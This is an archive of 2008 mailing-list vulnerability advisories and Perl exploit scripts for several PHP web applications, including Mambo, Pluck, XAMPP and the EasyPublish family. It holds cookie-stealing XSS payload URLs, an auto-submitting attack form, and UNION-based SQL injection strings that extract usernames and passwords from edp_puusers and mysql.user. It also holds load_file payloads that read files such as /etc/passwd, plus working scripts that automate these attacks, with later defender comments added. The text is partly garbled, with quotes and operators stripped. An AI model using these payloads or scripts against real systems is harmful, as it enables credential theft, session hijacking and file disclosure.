$ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req-referer($url);
$req-referer(IRCRASH.COM);
$req-content_type('application/x-www-form-urlencoded');
$req-header(content-length = $contlen);
$req-content($poststring);

$response = $ua-request($req);
$content = $response-content;
$header = $response-headers_as_string();

 
# Keep the text between "Login:" and "enduser".
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/enduser/,$name);
$name = @name[0];


# $password is not assigned inside this sub; the operator between the two
# tests is missing in this listing.
if(!$name  !$password)
{
print \n\n;
print !Exploit failed ! :(\n\n;
exit;
}
 
# Writes the extracted text to a local file, then reports source.txt.
open (FILE, .source..txt);
print FILE $name;
close (FILE);
print  File Save In source.txt\n;
print ;
 
}

#XPL2 END
#Starting;
print 

* $scriptname

*Discovered by : Khashayar Fereidani   *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *

* Mod Options :*
* Mod 1 : Find Script username and password*
* Mod 2 : File Disclosure(not work in many servers)*
;
print \n \n Enter Mod : ;
$mod=stdin;
if ($mod==1 or $mod==2) { print \n Exploiting .. \n; } else { 
print \n Unknown Mod ! \n Exploit Failed !; };
if ($mod==1) { xpl1(); };
if ($mod==2) { xpl2(); };


Nooms 1.1

2008-09-11 Thread irancrash


Script : Nooms 1.1

Type : Multiple Vulnerabilities (Cross Site Scripting/Redirect/Mysql Brute 
Force Local Access)

Risk : Medium



Download From : 
http://surfnet.dl.sourceforge.net/sourceforge/nooms/nooms_1.1.zip



Discovered by : Khashayar Fereidani Or Dr.Crash

My Website : HTTP://FEREIDANI.IR

Team Website : Http://IRCRASH.COM

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com



Mysql Remote Brute Force Vulnerability :


This is a new type of vulnerability .

I can't publish an exploit for this vulnerability ,
but with this vulnerability an attacker can brute force the root and other user 
passwords remotely through PHP .

Mysql Brute Force Vulnerability : 
/db.php?g_dbhost=localhostg_dbuser=[username]g_dbpwd=[password]



Cross Site Scripting Vulnerabilities :

Xss 1 : http://Example/smileys.php?page_id=scriptalert('xss')/script

Xss 2 : http://Example/search.php?q=;scriptalert('xss')/script



Redirect Vulnerability :

Redirect 1 : http://Example/admin/auth.php?g_site_url=[URL]



Tnx : God

  HTTP://IRCRASH.COM HTTP://FEREIDANI.IR




Mambo 4.6.2 Full Version - Multiple Cross Site Scripting - By Khashayar Fereidani

2008-08-15 Thread irancrash


Script : Mambo 4.6.2 Full  Older Versions

Type : Multiple Cross Site Scripting Vulnerabilities

Alert Level : Medium



Download From : 
http://surfnet.dl.sourceforge.net/sourceforge/mambo/MamboV4.6.2.zip



Discovered by : Khashayar Fereidani

My Website : HTTP://FEREIDANI.IR

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com



Cross Site Scripting Vulnerability 1 :

Vulnerable File : administrator/popups/index3pop.php

Vulnerable Line (5)  : title?php echo $mosConfig_sitename; ? - 
Administration [Mambo]/title

Vulnerable Variable : mosConfig_sitename

For Example : 
http://Example/administrator/popups/index3pop.php?mosConfig_sitename=/titlescriptalert(document.cookie)/script

An attacker can hijack the administrator's cookie and session and log in with them .



Cross Site Scripting Vulnerability 2 :

Vulnerable File : 
mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?

Vulnerable Variable : Any Variable - You can set any variable 

For Example set (hacker) variable : 
http://Example/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?khashayar=scriptalert('xss')/script

you can set cross site scripting code in variable name : 
http://Example/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?scriptalert('xss')/script=Hello+Word



Tnx : God

   HTTP://IRCRASH.COM   HTTP://FEREIDANI.IR




FlexCMS = 2.5 Cross Site Scripting Vulnerability

2008-08-15 Thread irancrash


Script : FlexCMS = 2.5

Type : Cross Site Scripting Vulnerability

Alert : Low



Download From : http://www.flexcms.com/



Discovered by : Khashayar Fereidani Or Dr.Crash

My Website : HTTP://FEREIDANI.IR

Team Website : Http://IRCRASH.COM

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com



Cross Site Scripting Vulnerability :

File Name : inc-core-admin-editor-previouscolorsjs.php

Vulnerable Variable : PreviousColorsString

Send Method : GET

Register_globals : On

Dangerous PHP Code (LINE 53) :  print 
'document.write(\''.$PreviousColorsString.'\');';

Address : 
http://example/inc-core-admin-editor-previouscolorsjs.php?PreviousColorsString=scriptalert(document.cookie)/script

Attacker can hijack admin cookie with this vulnerability 

Solution for patch : filter PreviousColorsString variable with 
htmlspecialchars() function ...




Tnx : God

 HTTP://IRCRASH.COM




Pluck 4.5.2 Multiple Cross Site Scripting Vulnerabilities

2008-08-05 Thread irancrash



Script : Pluck 4.5.2


Type : Multiple Cross Site Scripting Vulnerabilities


Alert : Medium 





Download From : http://www.pluck-cms.org/downloads/pluck-4_5_2.tar.gz





Discovered by : Khashayar Fereidani Or Dr.Crash


My Website : HTTP://FEREIDANI.IR


Our Team Website : HTTP://IRCRASH.COM


Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com




Cross Site Scripting Vulnerabilities :


All vulnerabilities work only when register_globals is set to on ,


XSS Vulnerability 1 : /data/inc/footer.php = 
http://Example.com/data/inc/footer.php?lang_footer=[Cross Site Scripting]


XSS Vulnerability 2 : /data/inc/header.php = 
http://Example.com/data/inc/header.php?pluck_version=[Cross Site Scripting]


XSS Vulnerability 3 : /data/inc/header.php = 
http://Example.com/data/inc/header.php?lang_install22=[Cross Site Scripting]


XSS Vulnerability 4 : /data/inc/header.php = 
http://Example.com/data/inc/header.php?titelkop=[Cross Site Scripting]


XSS Vulnerability 5 : /data/inc/header.php = 
http://Example.com/data/inc/header.php?lang_kop1=[Cross Site Scripting]


XSS Vulnerability 6 : /data/inc/header.php = 
http://Example.com/data/inc/header.php?lang_kop2=[Cross Site Scripting]


XSS Vulnerability 7 : /data/inc/header.php = 
http://Example.com/data/inc/header.php?lang_modules=[Cross Site Scripting]


XSS Vulnerability 8 : /data/inc/header.php = 
http://Example.com/data/inc/header.php?lang_kop4=[Cross Site Scripting]


XSS Vulnerability 9 : /data/inc/header.php = 
http://Example.com/pluck/data/inc/header.php?lang_kop15=[Cross Site Scripting]


XSS Vulnerability 10 : /data/inc/header.php = 
http://Example.com/data/inc/header.php?lang_kop5=[Cross Site Scripting]


XSS Vulnerability 11 : /data/inc/header.php = 
http://Example.com/data/inc/header.php?titelkop=[Cross Site Scripting]


XSS Vulnerability 12 : /data/inc/header2.php = 
http://Example.com/data/inc/header2.php?pluck_version=[Cross Site Scripting]


XSS Vulnerability 13 : /data/inc/header2.php = 
http://Example.com/data/inc/header2.php?titelkop=[Cross Site Scripting]


XSS Vulnerability 14 : /data/inc/header2.php = 
http://Example.com/data/inc/header2.php?titelkop=[Cross Site Scripting]


XSS Vulnerability 15 : /data/inc/themeinstall.php = 
http://Example.com/data/inc/themeinstall.php?lang_theme6=[Cross Site Scripting]



Solution : Filter all insecure variables with the htmlspecialchars() function 





Tnx : God


 HTTP://IRCRASH.COM  HTTP://FEREIDANI.IR





Xampp Linux 1.6.7 Multiple Cross Site Scripting Vulnerabilities

2008-08-04 Thread irancrash


Program : Xampp Linux 1.6.7

Type : Multiple Cross Site Scripting Vulnerabilities

Alert : Medium



Download From : 
http://puzzle.dl.sourceforge.net/sourceforge/xampp/xampp-linux-1.6.7.tar.gz



Discovered by : Khashayar Fereidani Or Dr.Crash

My Website : HTTP://FEREIDANI.IR

Team Website : Http://IRCRASH.COM

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com



Cross Site Scripting Vulnerabilities :

The vulnerabilities work only when register_globals is set to on .

http://Example.com/xampp/iart.php?text=;''scriptalert(document.alert)/script

http://Example.com/xampp/ming.php?text=;''scriptalert(document.alert)/script

Solution : Remove the xampp folder, or filter the text variable with the htmlspecialchars() function.



Tnx : God

 HTTP://IRCRASH.COM




MJGuest 6.8 GT Cross Site Scripting Vulnerability

2008-07-30 Thread irancrash



Script : MJGuest 6.8 GT


Type : Cross Site Scripting Vulnerability


Alert : Medium





Discovered by : Khashayar Fereidani


Our Team : IRCRASH


My Official Website : HTTP://FEREIDANI.IR


Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com





Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR





Script Download : http://www.mdsjack.bo.it/files/mjguest_6.8gt.zip




XSS Vulnerability :


Vulnerable Code : ./guestbook.js.php = document.write('<a href="javascript:guestbook()">' + '<?php echo $_GET['link']?>' + '</a>');


Vulnerable variable : link


Address : http://Example/guestbook.js.php?link=[XSS]


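Solution : Filter the link variable with the htmlspecialchars() function. Because the value is written inside a single-quoted JavaScript string, call it with ENT_QUOTES so that quote characters are escaped as well.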





Tnx : God


 HTTP://IRCRASH.COM





DEV WMS Multiple Vulnerabilities

2008-07-30 Thread irancrash



Script : DEV WMS


Type : Multiple Vulnerabilities ( Local file inclusion / Cross Site Scripting / 
SQL Injection )


Alert : High





Discovered by : Khashayar Fereidani Or Dr.Crash


My Website : HTTP://FEREIDANI.IR


Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com





Script Download : http://dev-wms.sourceforge.net/





XSS Vulnerability 1 :


Variable Sent Method : GET


Vulnerable Variable : session


Address : 
http://Example.com/?session=;scriptalert(document.cookie)/script


Solution : filter session variable with htmlspecialchars() function ...





Xss Vulnerability 2 : 


Variable Sent Method : POST


Vulnerable Variable : kluc


Address : http://Example.com/index.php?session=0action=search


change example.com to script address in a real site and save as ircrash.html , 
open file with browser and see your cookie .


html

head/head

body onLoad=javascript:document.form.submit()

form action=http://Example.com/index.php?session=0action=search; 
method=POST name=form

form method=post onSubmit=return validateprm(this)input type=hidden 
name=prip value=true/input type=hidden name=action value=search/

input type=hidden name=kluc 
value=#34#39#39#39#60#62#62#62#62scriptalert('xss')/script

/form

/body

/html


Solution : filter kluc variable with htmlspecialchars() function ...




SQL Injection :


Method Of Send : GET


Vulnerable Variable : article


Address : 
http://Example.com/index.php?session=0action=readclick=openarticle=[SQL CODE]


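Solution : Filter dangerous characters in the article variable; more reliably, pass it to the query as a bound parameter (prepared statement) instead of concatenating it into the SQL string.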




Local file inclusion :


Method Of Send : GET


Vulnerable Variable : step


Address : http://Example.com/admin/index.php?start=installstep=file.type%00


Solution : Check the step variable with an if statement against a fixed list of allowed values before it is used to build the include path.





Tnx : God


 HTTP://IRCRASH.COM





Easybookmarker 40tr Xss Vulnerability By Khashayar Fereidani

2008-07-21 Thread irancrash


Script : Easybookmarker 40tr

Type : Xss Vulnerability

Method : POST

Alert : High



Discovered by : Khashayar Fereidani a.k.a. Dr.Crash

My Offical Website : HTTP://FEREIDANI.IR

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com



Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR



Script Download : 
http://myiosoft.com/download/EasyBookMarker/easybookmarker-40tr.zip


Xss Vulnerability :

Variable : rs
Send Method : POST

Set rs variable with post method in ajaxp_backend.php : 
scriptalert('xss')/script for test vulnerability

html
head/head
body onLoad=javascript:document.form.submit()

form action=http://example/zomplog/ajaxp_backend.php;

method=POST name=form

input type=hidden name=rs value=#x22;#x20; 
scriptalert(document.cookie)/script

/form
/body
/html



Tnx : God

 HTTP://IRCRASH.COM




EasyPublish 3.0tr Multiple Vulnerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit )

2008-07-21 Thread irancrash
#!/usr/bin/perl
#
#
#Script : EasyPublish 3.0tr
#
#Type : Multiple Vulnerabilities ( Xss / Sql Injection Exploit / File 
Disclosure Exploit )
#
#Variable Method : GET
#
#Alert : High
#
#
#
#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
#
#My Official Website : HTTP://FEREIDANI.IR
#
#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
#
#
#
#Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR
#
#
#
#Script Download : http://myiosoft.com/download/EasyPublish/easypublish-30tr.zip
#
#
#
#Xss 1 : 
http://Example//staticpages/easypublish/index.php?PageSection=0page=individualtable=edp_Newsread=%scriptalert(document.cookie);/script
#
#
#
#SQL Injection :
#
#SQL 1 : 
http://Example/staticpages/easypublish/index.php?PageSection=0table=edp_Newspage=individualfage=searchread=1+union+all+select+1,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),3,4,1,5+FROM+edp_puusers/*;--
#
#
#
#
#Tnx : God
#
# HTTP://IRCRASH.COM
#
#


use LWP;
use HTTP::Request;
use Getopt::Long;
 
 


# header: prints the tool's banner (name and author credits).
# It reads no input and sends nothing over the network.
# NOTE(review): the string delimiters around the banner text appear to have
# been lost when the list archive rendered this message.
sub header
{
print 

*   EasyPublish 3.0tr Exploit  *

*Discovered by : Khashayar Fereidani   *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *
;
}
 
# usage: prints the one-line invocation help; the only argument the script
# takes is the base URL of the site to be tested.
sub usage
{
  print 
* Usage : perl $0 http://Example/

;
}   
   
 

# The base URL comes from the first command-line argument and is used
# unvalidated as the prefix of every request built below.
$url = ($ARGV[0]);

# Without an argument, show the banner and the usage text, then stop.
if(!$url)
{
header();
usage();
exit;
}
# Two normalisation steps: the first test looks for any "/" in the argument,
# the second for the "http://" scheme.
# NOTE(review): the right-hand sides lost their quoting in the archive;
# presumably they append "/" and prepend "http://" - confirm against an
# undamaged copy.
if($url !~ /\//){$url = $url./;}
if($url !~ /http:\/\//){$url = http://.$url;}
# xpl1: sends one request to /staticpages/easypublish/index.php in which the
# value following `read=` carries a UNION SELECT over the edp_puusers table,
# then cuts the puUsername / puPassword values out of the response body.
#
# Defender notes (all taken from the request as written below):
#  - Log indicators: a query string containing `union+all+select`, `concat(0x`
#    and `edp_puusers`; the fixed User-Agent
#    'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9'; the Referer IRCRASH.COM.
#  - The hex literals decode to the markers "Login:", "<enduser>",
#    "\r\nPassword:" and "<endpass>", so those strings appearing in a page
#    served by index.php indicate a successful extraction.
#  - Root cause is the `read` value reaching the SQL statement unescaped; the
#    fix is to bind it as a parameter (or cast it to an integer) server-side.
sub xpl1()
{
# Path and query string appended to the base URL.
$vul = 
/staticpages/easypublish/index.php?PageSection=0table=edp_Newspage=individualfage=searchread=1+union+all+select+1,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),3,4,1,5+FROM+edp_puusers/*;
$requestpage = $url.$vul;

 
# The request method is POST, but the injected data travels in the URL.
# $contlen and $poststring are not assigned anywhere in the visible part of
# this listing, so the body and content-length are presumably empty.
my $req  = HTTP::Request-new(POST,$requestpage);
$ua = LWP::UserAgent-new;
$ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req-referer($url);
$req-referer(IRCRASH.COM);
$req-content_type('application/x-www-form-urlencoded');
$req-header(content-length = $contlen);
$req-content($poststring);
 
# Send it and keep the body; $header is stored but not used in this sub.
$response = $ua-request($req);
$content = $response-content;
$header = $response-headers_as_string();
 
# Take the text between the "Login:" and "enduser" markers.
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/enduser/,$name);
$name = @name[0];
 
# Take the text between the "Password:" and "endpass" markers.
@password = split(/Password:/,$content);
$password = @password[1];
@password = split(/endpass/,$password);
$password = @password[0];

# Report failure and exit when the markers were not found in the response.
if(!$name  !$password)
{
print \n\n;
print !Exploit failed ! :(\n\n;
exit;
}
 
print \n Username: .$name.\n\n;
print  Password:  .$password.\n\n;

 
}
 

#XPL2

# xpl2: same injection point as xpl1, but the UNION SELECT wraps MySQL's
# load_file() around a path typed by the operator, and whatever comes back
# between the markers is written to a local file.
#
# Defender notes:
#  - load_file() only returns data when the database account used by the web
#    application holds the FILE privilege and the file is readable by the
#    MySQL server process; revoking FILE from the application account and
#    setting secure_file_priv removes this file-disclosure path even while
#    the SQL injection itself is unpatched.
#  - Log indicators are the same as for xpl1, with `load_file(` in the query
#    string.
sub xpl2()
{
print \n Example For File Address : /home/user/public_html/config.php\n Or 
/etc/passwd;
print \n Enter File Address :;
# The path is read from standard input and placed into the query unchanged.
$fil3 = stdin;

$vul = 
/staticpages/easypublish/index.php?PageSection=0table=edp_Newspage=individualfage=searchread=1+union+all+select+1,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),3,4,1,5+FROM+edp_puusers/*;
$requestpage = $url.$vul;
 
# Request set-up is identical to xpl1 (same User-Agent and Referer values).
my $req  = HTTP::Request-new(POST,$requestpage);
$ua = LWP::UserAgent-new;
$ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req-referer($url);
$req-referer(IRCRASH.COM);
$req-content_type('application/x-www-form-urlencoded');
$req-header(content-length = $contlen);
$req-content($poststring);
 
$response = $ua-request($req);
$content = $response-content;
$header = $response-headers_as_string();

 
# The returned file content sits between the "Login:" and "enduser" markers.
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/enduser/,$name);
$name = @name[0];


if(!$name  !$password)
{
print \n\n;
print !Exploit failed ! :(\n\n;
exit;
}
 
# Store the extracted text locally; the message below names source.txt.
open (FILE, .source..txt);
print FILE $name;
close (FILE);
print  File Save In source.txt\n;
print ;
 
}

#XPL2 END
#Starting;
print 

*   EasyPublish 3.0tr Exploit  *

*Discovered by : Khashayar Fereidani   *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *

* Mod Options

Easyecards 310a Multiple Vulnerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit ) By Khashayar Fereidani

2008-07-21 Thread irancrash
#!/usr/bin/perl
#
#
#Script : Easyecards 310a
#
#Type : Multiple Vulnerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit )
#
#Variable Method : GET
#
#Alert : High
#
#
#
#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
#
#My Offical Website : HTTP://FEREIDANI.IR
#
#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
#
#
#
#Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR
#
#
#
#Script Download : http://myiosoft.com/download/EasyE-Cards/easyecards-310a.zip
#
#
#Xss 1 : http://Example/?ResultHtml=scriptalert('xss')/script 
#
#Xss 2 : 
http://Example/index.php?step=2dir=''scriptalert('xss')/script
#
#Xss 3 : 
http://Example/index.php?step=2SenderName=''scriptalert('xss')/script
#
#Xss 4 : 
http://Example/index.php?step=2RecipientName=%3C%3E%3E%3E%3E%27%27%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E
#
#Xss 5 : 
http://Example/index.php?step=2SenderMail=''scriptalert('xss')/script
#
#Xss 6 : 
http://Example/index.php?step=2RecipientMail=%3C%3E%3E%3E%3E%27%27%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E
#
#
#
#SQL Injection :
#
#SQL 1 : 
http://Example/index.php?show=pickupsid=9'+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13/*
#
#
#
#
#Tnx : God
#
# HTTP://IRCRASH.COM
#
#


use LWP;
use HTTP::Request;
use Getopt::Long;
 
 


# header: prints the tool's banner (name and author credits).
# It reads no input and sends nothing over the network.
# NOTE(review): the string delimiters around the banner text appear to have
# been lost when the list archive rendered this message.
sub header
{
print 

*Easyecards 310a Exploit   *

*Discovered by : Khashayar Fereidani   *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *
;
}
 
# usage: prints the one-line invocation help; the only argument the script
# takes is the base URL of the site to be tested.
sub usage
{
  print 
* Usage : perl $0 http://Example/

;
}   
   
 

# The base URL comes from the first command-line argument and is used
# unvalidated as the prefix of every request built below.
$url = ($ARGV[0]);

# Without an argument, show the banner and the usage text, then stop.
if(!$url)
{
header();
usage();
exit;
}
# Two normalisation steps: the first test looks for any "/" in the argument,
# the second for the "http://" scheme.
# NOTE(review): the right-hand sides lost their quoting in the archive;
# presumably they append "/" and prepend "http://" - confirm against an
# undamaged copy.
if($url !~ /\//){$url = $url./;}
if($url !~ /http:\/\//){$url = http://.$url;}
# xpl1: sends one request whose query string (after `show=pickup`) closes a
# quoted value and appends a UNION SELECT reading `user` and `password` from
# the mysql.user table, then cuts both values out of the response body.
#
# Defender notes (all taken from the request as written below):
#  - The query only returns rows when the web application's database account
#    can read the mysql system schema; an application account limited to its
#    own database does not expose mysql.user through this flaw.
#  - Log indicators: a query string containing `'+union+select`, `concat(0x`
#    and `mysql.user`; the fixed User-Agent
#    'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9'; the Referer IRCRASH.COM.
#  - The hex literals decode to the markers "Login:", "<enduser>",
#    "\r\nPassword:" and "<endpass>".
#  - The fix is to bind the value as a query parameter server-side.
sub xpl1()
{
# Query string appended to the base URL.
$vul = 
?show=pickupsid=9'+union+select+0,concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),2,3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*;
$requestpage = $url.$vul;

 
# The request method is POST, but the injected data travels in the URL.
# $contlen and $poststring are not assigned anywhere in the visible part of
# this listing, so the body and content-length are presumably empty.
my $req  = HTTP::Request-new(POST,$requestpage);
$ua = LWP::UserAgent-new;
$ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req-referer($url);
$req-referer(IRCRASH.COM);
$req-content_type('application/x-www-form-urlencoded');
$req-header(content-length = $contlen);
$req-content($poststring);
 
# Send it and keep the body; $header is stored but not used in this sub.
$response = $ua-request($req);
$content = $response-content;
$header = $response-headers_as_string();
 
# Take the text between the "Login:" and "enduser" markers.
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/enduser/,$name);
$name = @name[0];
 
# Take the text between the "Password:" and "endpass" markers.
@password = split(/Password:/,$content);
$password = @password[1];
@password = split(/endpass/,$password);
$password = @password[0];

# Report failure and exit when the markers were not found in the response.
if(!$name  !$password)
{
print \n\n;
print !Exploit failed ! :(\n\n;
exit;
}
 
print \n Username: .$name.\n\n;
print  Password:  .$password.\n\n;

 
}
 

#XPL2

# xpl2: same injection point as xpl1, but the UNION SELECT wraps MySQL's
# load_file() around a path typed by the operator, and whatever comes back
# between the markers is written to a local file.
#
# Defender notes:
#  - load_file() only returns data when the database account used by the web
#    application holds the FILE privilege and the file is readable by the
#    MySQL server process; revoking FILE from the application account and
#    setting secure_file_priv removes this file-disclosure path even while
#    the SQL injection itself is unpatched.
#  - Log indicators are the same as for xpl1, with `load_file(` in the query
#    string.
sub xpl2()
{
print \n Example For File Address : /home/user/public_html/config.php\n Or 
/etc/passwd;
print \n Enter File Address :;
# The path is read from standard input and placed into the query unchanged.
$fil3 = stdin;

$vul = 
?show=pickupsid=9'+union+select+0,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),2,3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*;
$requestpage = $url.$vul;
 
# Request set-up is identical to xpl1 (same User-Agent and Referer values).
my $req  = HTTP::Request-new(POST,$requestpage);
$ua = LWP::UserAgent-new;
$ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req-referer($url);
$req-referer(IRCRASH.COM);
$req-content_type('application/x-www-form-urlencoded');
$req-header(content-length = $contlen);
$req-content($poststring);
 
$response = $ua-request($req);
$content = $response-content;
$header = $response-headers_as_string();

 
# The returned file content sits between the "Login:" and "enduser" markers.
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/enduser/,$name);
$name = @name[0];


if(!$name  !$password)
{
print \n\n;
print !Exploit failed ! :(\n\n;
exit;
}
 
# Store the extracted text locally; the message below names source.txt.
open (FILE, .source..txt);
print FILE $name;
close (FILE);
print  File Save In source.txt\n;
print ;
 
}

#XPL2 END
#Starting;
print 

*Easyecards 310a Exploit   *

*Discovered by : Khashayar Fereidani   *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir

Maran PHP Blog Xss By Khashayar Fereidani

2008-07-21 Thread irancrash



Script : Maran PHP Blog


Type : XSS (Passive)


Method : GET


Alert : Medium





Discovered by : Khashayar Fereidani a.k.a. Dr.Crash


My Offical Website : HTTP://FEREIDANI.IR


Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com





Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR





Script Download : 
http://www.maran.pamil-visions.com/download2.php?dir=maranphpfile=maranblog.zip





There is one XSS vulnerability, in the id variable.

An attacker can execute JavaScript code, obtain the admin cookie, and post a new article using the admin cookie.


Xss Address : 
http://Example/comments.php?id=%3E%3C%3E%27%3Cscript%3Ealert(document.cookie)%3C/script%3E






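Solution : Edit the source code and filter the id variable with the htmlspecialchars() function in comments.php ...


line 32 : <input type='hidden' name='id' value='<?echo $_GET['id'];?>'><br>


Change It To : <input type='hidden' name='id' value='<?echo htmlspecialchars($_GET['id']);?>'><br>

The attribute is delimited with single quotes, so pass ENT_QUOTES as the second argument to htmlspecialchars(); on PHP versions before 8.1 the default flags leave single quotes unescaped.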





Tnx : God


 HTTP://IRCRASH.COM





Easydynamicpages 30tr Multiple Vulnerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit )

2008-07-21 Thread irancrash
#!/usr/bin/perl
#
#
#Script : Easydynamicpages 30tr
#
#Type : Multiple Vulnerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit )
#
#Variable Method : GET
#
#Alert : High
#
#
#
#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
#
#My Offical Website : HTTP://FEREIDANI.IR
#
#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
#
#
#
#Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR
#
#
#
#Script Download : 
http://myiosoft.com/download/EasyDynamicPages/easydynamicpages-30tr.zip
#
#
#
#Xss 1 : 
http://Example/staticpages/easycalendar/index.php?PageSection=1month=4year=scriptalert(document.cookie);/script
#
#
#
#SQL Injection :
#
#SQL 1 : 
http://Example/dynamicpages/index.php?page=individualtable=edp_Help_Internal_Newsread=1+union/**/select/**/0,1,2,3,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),5,6/**/from/**/edp_puusers/*
#
#
#
#
#Tnx : God
#
# HTTP://IRCRASH.COM
#
#


use LWP;
use HTTP::Request;
use Getopt::Long;
 
 


# header: prints the tool's banner (name and author credits).
# It reads no input and sends nothing over the network.
# NOTE(review): the string delimiters around the banner text appear to have
# been lost when the list archive rendered this message.
sub header
{
print 

* Easydynamicpages 30tr Exploit*

*Discovered by : Khashayar Fereidani   *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *
;
}
 
# usage: prints the one-line invocation help; the only argument the script
# takes is the base URL of the site to be tested.
sub usage
{
  print 
* Usage : perl $0 http://Example/

;
}   
   
 

# The base URL comes from the first command-line argument and is used
# unvalidated as the prefix of every request built below.
$url = ($ARGV[0]);

# Without an argument, show the banner and the usage text, then stop.
if(!$url)
{
header();
usage();
exit;
}
# Two normalisation steps: the first test looks for any "/" in the argument,
# the second for the "http://" scheme.
# NOTE(review): the right-hand sides lost their quoting in the archive;
# presumably they append "/" and prepend "http://" - confirm against an
# undamaged copy.
if($url !~ /\//){$url = $url./;}
if($url !~ /http:\/\//){$url = http://.$url;}
# xpl1: sends one request to /dynamicpages/index.php in which the value
# following `read=` carries a UNION SELECT over the edp_puusers table, then
# cuts the puUsername / puPassword values out of the response body.
#
# Defender notes (all taken from the request as written below):
#  - The statement uses `/**/` comment sequences where spaces would normally
#    separate SQL keywords, so log searches and input filters should match on
#    the keywords with comments and whitespace normalised, not on literal
#    "union select".
#  - Other indicators: `concat(0x` and `edp_puusers` in the query string; the
#    fixed User-Agent 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9'; the
#    Referer IRCRASH.COM.
#  - The hex literals decode to the markers "Login:", "<enduser>",
#    "\r\nPassword:" and "<endpass>".
#  - The fix is to bind the `read` value as a query parameter (or cast it to
#    an integer) server-side.
sub xpl1()
{
# Path and query string appended to the base URL.
$vul = 
/dynamicpages/index.php?page=individualtable=edp_Help_Internal_Newsread=1+union/**/select/**/0,1,2,3,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),5,6/**/from/**/edp_puusers/*;
$requestpage = $url.$vul;

 
# The request method is POST, but the injected data travels in the URL.
# $contlen and $poststring are not assigned anywhere in the visible part of
# this listing, so the body and content-length are presumably empty.
my $req  = HTTP::Request-new(POST,$requestpage);
$ua = LWP::UserAgent-new;
$ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req-referer($url);
$req-referer(IRCRASH.COM);
$req-content_type('application/x-www-form-urlencoded');
$req-header(content-length = $contlen);
$req-content($poststring);
 
# Send it and keep the body; $header is stored but not used in this sub.
$response = $ua-request($req);
$content = $response-content;
$header = $response-headers_as_string();
 
# Take the text between the "Login:" and "enduser" markers.
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/enduser/,$name);
$name = @name[0];
 
# Take the text between the "Password:" and "endpass" markers.
@password = split(/Password:/,$content);
$password = @password[1];
@password = split(/endpass/,$password);
$password = @password[0];

# Report failure and exit when the markers were not found in the response.
if(!$name  !$password)
{
print \n\n;
print !Exploit failed ! :(\n\n;
exit;
}
 
print \n Username: .$name.\n\n;
print  Password:  .$password.\n\n;

 
}
 

#XPL2

# xpl2: same injection point as xpl1, but the UNION SELECT wraps MySQL's
# load_file() around a path typed by the operator, and whatever comes back
# between the markers is written to a local file.
#
